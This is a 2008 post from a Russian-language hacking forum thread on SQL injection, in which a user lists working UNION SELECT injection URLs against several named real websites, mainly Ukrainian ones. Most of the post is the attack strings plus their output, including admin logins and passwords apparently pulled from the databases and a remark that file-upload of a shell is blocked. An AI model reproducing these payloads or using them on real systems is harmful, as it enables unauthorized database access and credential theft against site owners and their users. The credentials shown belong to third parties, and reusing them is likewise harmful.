ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу SQL Инъекции
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

  #11  
Старый 15.07.2008, 00:14
Аватар для sabe
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию
RBC.ua - РБК Украина - PR 5

мой любимый способ вывода - в .txt
Цитата:
http://marketing.rbc.ua/file.php?id=99999+union+select+concat_ws(0x3a,user ,password),2,3+from+mysql.user/*
root: а пасса поидее нету

шелл не зальеш ( фильтруются кавычки..

теперь пойдем по субдомменах..

Цитата:
http://marketing.rbc.ua/file.php?id=99999+union+select+concat_ws(0x3a,logi n,pass),2,3+from+presscenter.sys_user/*
Press.rbc.ua/admin/
admin;5660511

Цитата:
http://marketing.rbc.ua/file.php?id=99999+union+select+concat_ws(0x3a,logi n,pass),2,3+from+radio.sys_user/*
Radio.rbc.ua/admin/
admin;5660511

Цитата:
http://marketing.rbc.ua/file.php?id=99999+union+select+concat_ws(0x3a,logi n,password),2,3+from+rbc_research.rbc_users/*
Research.rbc.ua
shultz:shultz

бд большая - рут. найти можно много интересного..


Pogoda.ua- PR 4
Цитата:
http://www.pogoda.ua/index.php?id=999999+union+select+1,concat_ws(0x3a, version(),user(),database()),3,4,5/*
увы 4 мускул. хехе угадал табличку.....
Цитата:
http://www.pogoda.ua/index.php?id=999999+union+select+1,concat_ws(0x3a, login,password),3,4,5+from+users/*
InnovateOnline.info - PR 6
Цитата:
http://innovateonline.info/index.php?view=article&id=9999999+union+select+1,c oncat_ws(0x3a,password)+from+innovate.person_accou nt/*
пассы...
Цитата:
http://innovateonline.info/index.php?view=article&id=9999999+union+select+1,c oncat_ws(0x3a,email)+from+innovate.person/*
мыла...
Цитата:
http://innovateonline.info/index.php?view=article&id=9999999+union+select+1,c oncat_ws(0x3a,user_login,user_pass)+from+innovate_ jobs.wp_users/*
WP - токо где он ?

пс: второй домен webhost.fgsweb.fgsehs.nova.edu


Effective.net.ua
Цитата:
http://www.effective.net.ua/show_obj.php?a=-1+union+select+1,2,3,4,5,6,7,version(),9,10,11,12, 13,14,15,16,17/*
Ekip.com.ua
Цитата:
http://ekip.com.ua/index.php?id=623+union+select+1,2,3,4,5,6,7,8,9,10 ,11,12,13,14,15--
вывод необнаружен..(
Последний раз редактировалось sabe; 03.08.2008 в 19:10..
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ